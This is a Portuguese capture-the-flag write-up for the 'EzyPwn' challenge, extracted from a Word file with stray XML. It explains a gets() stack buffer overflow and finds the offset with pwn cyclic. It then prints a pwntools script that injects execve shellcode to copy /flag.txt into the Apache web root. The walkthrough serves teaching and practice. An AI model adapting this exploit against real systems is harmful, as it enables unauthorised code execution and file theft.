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ygy307qsk85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v9fdudgsqr2z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EzyPwn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bxmje99qrhac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Fazendo o download do anexo, podemos começar as nossas análises pelo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ezynotes.c,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mas note que também há um arquivo de configuração do apache, o que indica que provavelmente, de alguma forma, vamos ter que usar o servidor web provido pelo desafio.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824538" cy="3914775"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="254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39147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docker-compose.yml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verificou-se que o ambiente expõe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provavelmente associada ao servidor web (Apache), e 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9000,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possivelmente relacionada à execução do binário da aplicação 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68500"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="254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Partindo para o  nosso programa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além da função main, temos também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generateRandomString()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Vamos começar por ela.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25400" l="25400" r="25400" t="254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Basicamente, a função recebe o tamanho de uma string, itera sobre um charset pegando caracteres aleatórios e devolve uma string randômica. Vamos agora entender como e para que ela é usada.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727700"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="2540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programa recebe o input do usuário e o aloca em um buffer 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ytes utilizando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gets(),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é de notório saber que é vulnerável por padrão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buffer overflow.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Somado a isso, o programa ainda nos fornece o endereço do buffer onde o nosso input é gravado, dando a entender que a máquina onde o binário está sendo executado tem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ASLR,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então ele entrega esse endereço para facilitar a exploração.</w:t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Depois,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generateRandomString()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chamada para gerar um nome de arquivo aleatório dentro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/var/www/htm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 no arquivo de configuração do apache presente nos arquivos em anexo, este diretório é definido como o document root da aplicação. Por fim, o programa escreve o nosso input diretamente no arquivo gerado e nos devolve a url para um posterior acesso.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Concluído o code review e já sabendo que exploraremos uma vulnerabilidade de buffer overflow, podemos usar o binário já compilado presente no anexo para fazer uma análise local. Faremos o debug do programa usando o gdb com o plugin </w:t>
      </w:r>
      <w:hyperlink r:id="rId12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pwngdb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Podemos começar já gerando um padrão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bytes com o </w:t>
      </w:r>
      <w:hyperlink r:id="rId1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pwntools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sobrescrever o endereço de retorno com o seguinte comando.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000022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pwn cyclic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podemos ver, sobrescrevemos o endereço de retorno (veja a instrução ret)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0x6561616465616163,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como sabemos, é um valor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hexadecimal em little-endian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então, para descobrir o nosso offset, precisamos trazer esse valor para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ascii.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fazer isso usando esse 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site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(não esqueça de inverter). Agora, para descobrir o nosso offset, podemos novamente usar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pwntools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seguinte comando.</w:t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pwn cyclic -l caaedaae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Feito tudo isso, podemos finalmente escrever um script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novamente usando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pwntools,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finalizar a exploração. Para evitar problemas com a execução do shellcode, podemos, ao invés de abrir uma reverse shell, simplesmente copiar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/flag.txt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o nosso servidor web.</w:t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pwn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context.arch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'amd64'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 = remote(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'ezynotes.hc'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 # conexão remota com o binário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r.recvuntil(b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 gift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  # pega o endereço do input buffer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stack_address = int(r.recvline().strip(), 16)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log.success(f"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stack address of our entrypoint: {hex(stack_address)}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 =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 /flag.txt /var/www/html/flag.txt &amp;&amp; chmod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/var/www/html/flag.txt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shellcode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(shellcraft.execve(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"/bin/sh"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"/bin/sh"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cmd],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log.info(f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shellcode size: {len(shellcode)} bytes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offset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408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pwn cyclic -l caaedae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len(shellcode) &gt; offset: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log.critical(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"[!] big shellcode!"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exit()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 = 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\x90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(offset - len(shellcode)) # no operations (nops)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 = shellcode + padding + p64(stack_address) # juntando tudo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r.sendline(payload)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log.success(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"[+] payload sent!"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try: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r.recvall(timeout=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Executando exploit foi possível obter a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749800"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="254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>
        <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
      </w:rPr>
    </w:pPr>
    <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.yqifact2v1j8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7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EzyPwn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1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22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer3.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image3.png"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer2.xml"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.pwntools.com/en/stable/" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://pwndbg.re/stabl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rapidtables.com/convert/number/hex-to-ascii.html" TargetMode="External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+1ygMIu1Hfw0w3Yp/vzq56QkQ==">CgMxLjAyDmgueWd5MzA3cXNrODVpMg5oLnY5ZmR1ZGdzcXIyejIOaC5ieG1qZTk5cXJoYWMyDmgueXFpZmFjdDJ2MWo4OAByITFmbkJEVFJZNWJtZ1QxbWNuTTR5c2FCQlFYX3M1OVExRQ==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